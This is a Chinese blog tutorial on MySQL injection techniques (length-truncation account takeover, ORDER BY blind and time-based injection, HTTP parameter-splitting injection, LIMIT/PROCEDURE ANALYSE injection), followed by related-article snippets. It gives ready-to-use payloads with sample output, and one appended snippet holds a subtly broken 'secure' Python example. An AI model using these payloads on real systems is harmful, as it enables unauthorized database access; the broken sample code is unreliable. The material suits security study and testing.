mysql注入之长字符截断、orderby注入、HTTP分割注入、limit注入

最新推荐文章于 2024-08-06 17:40:36 发布
原创 最新推荐文章于 2024-08-06 17:40:36 发布 · 6.3k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #渗透测试 #经验分享 #安全 #web安全

本文详细介绍了SQL注入攻击的几种常见形式,包括长字符截断、orderby rand()盲注、时间盲注和HTTP分割注入,以及如何利用这些漏洞进行攻击。同时,也讨论了limit注入在不同情况下如何利用PROCEDURE函数进行注入。针对这些问题,文章强调了设置合适的SQL_mode、输入验证和参数化查询等防范措施的重要性。

长字符截断/SQL约束攻击

  • 产生原因:在mysql中的一个设置里有一个sql_mode选项,当sql_mode设置为default时,即没有开启STRICT_ALL_TABLES选项时(MySQL默认 sql_mode为default),MySQL对插入超长的值只会提示warning,而不是error,这样就会导致一些截断问题。 

例如

  • 一个表的username字段类型为varchar(7) 长度最多7个字符。那么我们插入的时候将字符提高到8字符以上,它只取前7位,并且会弹出warning。

利用漏洞:

  • 假设管理员的登录名为admin,那么我们可以注册一个“admin        ”后面有八个空格用户即可轻易进入后台管理界面。

order by rand(True)   /order by rand(False)盲注

  • 产生原因:原语句类似为$id=$_GET['sort'];     select * from users order by $id ;

  • 利用漏洞:

    • 报错注入?sort=1 and updatexml(1,if(1=1,concat(0x7e,version()),2),1)
    • 盲注 order by rand(True)和order by rand(False)的结果排序是不同的,可以根据这个不同来进行盲注。
  • 例如:
    • 布尔盲注:?sort= rand(database()='ujcms')             
      • 返回了True的排序,说明database()='ujcms'是正确的值

  • 时间盲注 ?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))
    • 执行结果睡眠2秒

 HTTP分割注入

场景:参数为username&password,查询语句为  select xxx from xxx where username='xxx' and password ='xxx';但是username参数过滤了注释符,无法将后面的注释掉,则可尝试用内联注释把password注释掉,凑成一条新语句后注释或闭合掉后面的语句:

当然这种注入的前提是单引号没有被过滤

  • payload:username=1' or extractvalue /*'&password=1*/ (1,concat(0x7e,(select database()),0x7e))) or'

  • 则查询语句为select * from users where username='1' or extractvalue /*' and password='1*/ (1,concat(0x7e,(select database()),0x7e)) or'';

过滤了空格,union,#,—+,/*,^,or,|

  • 可以考虑将password作为函数的参数来闭合语句:

  • payload:username=admin' and(strcmp(&password=,'asdasdasdasdasdasd')) and '1

  • 则查询语句为select * from users where username='admin' and(strcmp(' and password=','asdasdasdasdasdasd')) and '1';

    • strcmp比较,二者不一致返回True,一致返回False,而MySQL会将’1’判断为数字1,即True,因此该查询语句结果为True

limit注入

一般实际过程中使用 limit 时,大概有两种情况,一种使用order by,一种就是不使用 order by关键字

不存在 order by 关键字

  • 执行语句 select id from users limit 0,1; 

  • 这种情况下的 limit 后面可以使用union进行联合查询注入

  • 执行语句 select id from users limit 0,1 union select username from users;

 

存在 order by 关键字

  • 此方法适用于5.0.0< MySQL <5.6.6版本,在limit语句后面的注入

  • limit 关键字后面还可跟PROCEDURE和 INTO两个关键字,但是 INTO 后面写入文件需要知道绝对路径以及写入shell的权限,因此利用比较难,因此这里以PROCEDURE为例进行注入

  • 使用 PROCEDURE函数进行注入,ANALYSE支持两个参数,首先尝试一下默认两个参数

mysql> select id from users order by id desc limit 0,1 procedure analyse(1,1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

  • 报错,尝试一下对其中一个参数进行注入,这里首先尝试报错注入

mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':5.5.53'

  • 不存在回显怎么办,延迟注入呀,如果 select version(); 第一个为5,则多次执行sha(1)达到延迟效果,这里不支持使用 sleep,所以需要使用BENCHMARK进行替代 

mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1)))),1);
ERROR 1105 (HY000): XPATH syntax error: ':0'

3、SQL注入与任意文件读取漏洞全解析
nept的博客
07-23 75
本文深入解析了SQL注入与任意文件读取漏洞的原理、利用方式及防御策略。内容涵盖错误类型SQL注入、堆叠注入、SELECT/INSERT/UPDATE/DELETE注入技术、SQL注入的绕过技巧以及任意文件读取漏洞的成因与防范措施。同时探讨了两种漏洞的协同攻击思路,并提出了涵盖开发、测试及运行阶段的综合安全防护策略,为提升Web应用安全性提供了全面指导。
MySQL数据库SQL注入靶场sqli通关实战(附靶场安装包)
悦分享
10-20 625
SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。带入执行的参数能够可控;拼接的SQL语句能够带入数据库中,并执行;SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。
SQL注入(宽字节注入、长字符截断
qq_28786023的博客
10-05 3465
本文仅记录SQL注入漏洞学习过程中的基本知识。 SQL注入漏洞是完全可以避免的安全问题。从其形成原因来看,就是**用户输入的数据(可能带有恶意)被SQL解释器当作代码执行,**从而获得更多数据库的信息或者获得更高的权限。从原理上来说,SQL注入可以分为两大类,数字型注入字符串型注入;(《web安全深度剖析 张炳帅》)。 数字型注入 即输入类型为int类型,如ID,年龄,页码等。一般来说,数字型注入只存在于弱类型语句中,如:PHP,ASP,python,而对于C,java等强类型语言则不存在。弱类型语言会自
MYSQL字符截断
weixin_50464560的博客
03-03 1583
本人freebuf文章:https://www.freebuf.com/vuls/264586.html MYSQL字符截断 即使没有任何注入漏洞,攻击者也可能登录到后台管理页面 1、相关资料 2、sql-mode的各项设置 MySQL5.0以上版本支持三种sql_mode模式:ANSI、TRADITIONAL和STRICT_TRANS_TABLES。 1、ANSI模式:宽松模式,更改语法和行为,使其更符合标准SQL。对插入数据进行校验,如果不符合定义类型或长度,对数据类型调整或截断保存,报warni
超长字符截断注入
aiquan9342的博客
02-11 299
注入方法也是昨天看到某技术交流群聊到,闻所未闻便想要学习了,今天看某微信公众号的时候又再次看到关于”长字符截断注入“的文章. 但是经过一番了解,其实这个注入姿势很难找到了,因为它需要满足以下条件。   1.可以注册用户,而且可以注册带有空格的用户   2.你需要知道管理员的账号 看下面CODE mysql> create table test( -&...
利用mysql对特殊字符和超长字符会进行截断的特性 进行存储型XSS攻击——WordPress <4.1.2 & <=4.2 存储型xss...
weixin_34144848的博客
07-31 417
转自:Baidu Security Lab Xteam http://xteam.baidu.com/?p=177 漏洞概述 本次漏洞出现两个使用不同方式截断来实现的存储型xss,一种为特殊字符截断,一种为数据库字段长度截断,该漏洞导致攻击者可获取用户 cookie以及模拟浏览器正常操作,并且当管理员访问到注入的payload时,结合wordpress后台功能甚至可以getshell。   ...
关于MYSQL字符截断的实现介绍
hdxx2022的博客
08-25 290
MySQL中的一个设置里有一个sql_mode选项,当sql_mode设置为default时,即没有开启STRICT_ALL_TABLES选项时(MySQLsql_mode默认即default),MySQL对插入超长的值只会提示warning,而不是error,这样就可能会导致一些截断问题。可以发现,第二条与第三条数据的长度为7,也就是列的规定长度,由此可知,在默认情况下,如果数据超出列默认长度,MySQL会将其截断。③插入错误的SQL语句,长度已经超过原有的规定长度。①插入正常的SQL语句。
SQL注入MySQL元数据库,外网实战手工SQL注入
h1008685的博客
08-04 1156
MySQL元数据库讲解,实战外网站点sql注入全流程
原理+实战掌握SQL注入方法
Lemon's blog
11-19 1384
前言: SQL注入web安全中最常见的攻击方式,SQL注入有很多姿势,但如果只知道payload,不知道原理,感觉也很难掌握,这次就总结一下我所遇到的SQL注入姿势,原理分析+题目实战。 0x00 Xpath报错注入 涉及函数 updatexml():对xml进行查询和修改 extractvalue():对xml进行查询和修改 报错语句构造 select extractvalue(1,conca...
Mysql】第六章 表增删改查(insert+duplicate+replace+select+distinct+where+order by+limit+update+delete+truncat
YQ20210216的博客
08-06 1136
/这在select后出现的列,在group by中也要出现,意思是被group by分组后的列,才能在select中打印。:group by的插入位置,执行顺序,where、group by、select、order by、limit查询工资高于500或岗位为MANAGER的雇员,同时还要满足他们的姓名首字母为大写的J。,分组之后再过滤行数大于1的,就表示同一个名字至少有2条记录,重复了。筛选等于null的数据,筛选等于null的数据,用。筛选不等于null的数据,筛选不等于null的数据。
截断注入
gl620321的博客
08-11 1289
一、截断注入 1.SQL攻击(SQL injection),简称注入攻击,是发生于应用程序之间数据库层的安全漏洞。 2.简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序之中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏。 因为字符注入一般都带有单引号(‘),构造诸如攻击需要闭合单引号 或者双条件查询的情况下转义一个单引号,这个时候就...
通过 HTTP 头进行 SQL 注入
xiaoshan812613234的专栏
08-14 780
在漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步。这篇文章解释了别人是如何通过HTTP头部对你的数据库进行SQL注入攻击的,以及讨论下选择哪种漏洞扫描器测试SQL注入。 在漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步。有时,当做web应用程序测试时,SQL注入漏洞的测试用例通常局限于特殊的输入向量GET和POST变量。那么对于其他的HTTP头部参数呢?难道他们不是潜在的SQ
数据库应用常见问题——MySQL字符串截取
jinxlzc的博客
04-11 577
在很多时候数据库的表中的某一字段会存有多个信息,有的是按照指定的分隔符隔开,有的是按照不同的位置进行划分,那么有的时候就不得不将该字段的每条记录做选择性截取或是分割成多个字段,这一步骤可以在业务逻辑层中完成,也使用SQL存储过程里完成,这里我要说的就是存储过程中的字符串截取 先准备如下的数据表以备实验: 1.左右截取 1.1left(str, length) 截取字符串从左起的n位,比...
字符注入
m0_37923208的博客
09-26 454
字符注入gbk是一种多字符编码,通常来说,一个gbk编码汉字,占用2个字节。一个utf-8编码的汉字,占用3个字节。PHP在开启magic_quotes_gpc或者使用addslashes、iconv等函数的时候,单引号(’)会被转义成\’。比如字符%bf在满足上述条件的情况下会变成%bf\’。其中反斜杠(\)的十六进制编码是%5C,单引号(’)的十六进制编码是%27,那么就可以得出%bf \’=
mysql 查询字段被截断_(SqlServe)关于字符串长度被截断的问题
weixin_29157493的博客
01-19 2292
1. 问题描述在同步数据时常常会发现一个错误:将截断字符串或二进制数据。2. 问题原因这个问题出现的原因是:要插入的数值字段的长度超出了数据库中字段的长度。比如:插入的字符串字节长度是40,数据库中字段长度设置为了varchar(36)就会报此错误。3.问题扩展a. 如何计算字符串长度和字节长度,既:datalength和len区别。len:返回字符串的长度datalength:返回字符串的字节长...
mysql注入limit 注入
Sp4rkW的博客
03-05 4800
limit注入基本常见的分两种场景,存在`order by`与否,本文将复现尝试各种limit注入的姿势与讨论不同mysql版本对注入payload的影响。作者能力有限,有更多思路欢迎讨论~
sql注入
frutrue的博客
10-26 1095
简单的sql注入笔记: 一、sql注入 sql注入(sql injection)被称为sql数据库结构化查询,是由于程序员在编写代码时的不严谨所造成的漏洞,它能让外部人员通过sql语句,查询到数据库的重要内容,容易造成数据泄露,隐私文件被读取,财产损失等。 sql注入条件: 1.参数用户可控:前端传给后端的参数用户可控。 2.参数带入数据库查询:传入的参数拼接到SQL语句中,且带入数据库中查询 只要存在着两个条件,就有可能产生sql注入漏洞。现在市面上的数据库类型有Access,mysql,mssql,P
sql-lab关于limit注入(网络信息安全实验室 第四题)
weixin_43803070的博客
04-27 2091
关于limit注入(记一次sql注入) 1.函数解释 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML() 1)extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是Str...
网络安全进阶学习第十课——MySQL手工注入
p36273的博客
08-02 2655
多了一列选项,由于正确就会执行sleep(1),所以相应时间最长的那一个就是正确的结果,这里就是14。这样就知道security这个数据库里面所有的表名字:emails,referers,uagents,users。现在这样子就知道了users这个表的所有字段名,假设知道了字段是:id,username,password。好了这样就知道所有的表名字是:emails,referers,uagents,users。,这个函数第二个参数要是有特殊字符是会报错的,这里0x7e是“~”的URL编码。
sqllab排序注入原理
最新发布
02-28
### SQLLab 中排序注入攻击原理及实现方式 #### 排序注入的基础概念 SQL 注入是一种常见的 Web 应用程序安全漏洞,允许攻击者通过操纵输入来执行任意 SQL 查询。在特定情况下,当应用程序使用用户提供的参数控制 `ORDER BY` 子句时,可能会发生排序注入。 如果应用程序未正确验证或转义这些参数,则可能导致恶意 SQL 语句被执行。这不仅可能暴露敏感数据,还可能被用于进一步的攻击向量[^1]。 #### 实现方式 假设存在一个 URL 参数用于指定排序条件: ``` http://example.com/list?sort=price ``` 此时服务器端代码可能是这样的形式: ```php $query = "SELECT * FROM products ORDER BY $_GET['sort']"; ``` 在这种结构下,如果攻击者提交如下请求: ``` http://example.com/list?sort=id DESC, (SELECT password FROM users LIMIT 1)-- ``` 则最终形成的查询将是非法并带有潜在危害性的: ```sql SELECT * FROM products ORDER BY id DESC, (SELECT password FROM users LIMIT 1)-- ``` 这种类型的注入利用了 MySQL 对多列排序的支持以及注释符 (`--`) 来截断后续部分[^2]。 为了防止此类攻击的发生,应当始终对来自用户的任何输入进行严格的校验和清理;对于动态构建的 SQL 语句尤其如此。推荐的做法是采用预处理语句(Prepared Statements),它能有效隔离变量值与实际命令文本之间的关系,从而大大降低风险水平。 此外,在开发过程中应遵循最小权限原则配置数据库账户,并定期审查应用逻辑是否存在可被滥用之处。 #### 安全建议 - 使用 ORM 或者预编译语句代替直接拼接字符串的方式构造 SQL; - 输入过滤:去除不必要的特殊字符; - 输出编码:确保所有输出都经过适当转换再显示给前端; - 错误消息控制:避免泄露过多内部信息帮助黑客定位问题所在; - 数据库设计层面考虑分层架构,减少单一表内存储多种类型重要资料的可能性。 ```python import mysql.connector connection = mysql.connector.connect( host='localhost', user='root', passwd='', database='testdb' ) cursor = connection.cursor(prepared=True) stmt = 'SELECT * FROM products WHERE category=%s ORDER BY %s ASC;' category = ('electronics',) order_by_column = cursor.execute(stmt, (*category,)) results = cursor.fetchall() for row in results: print(row) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值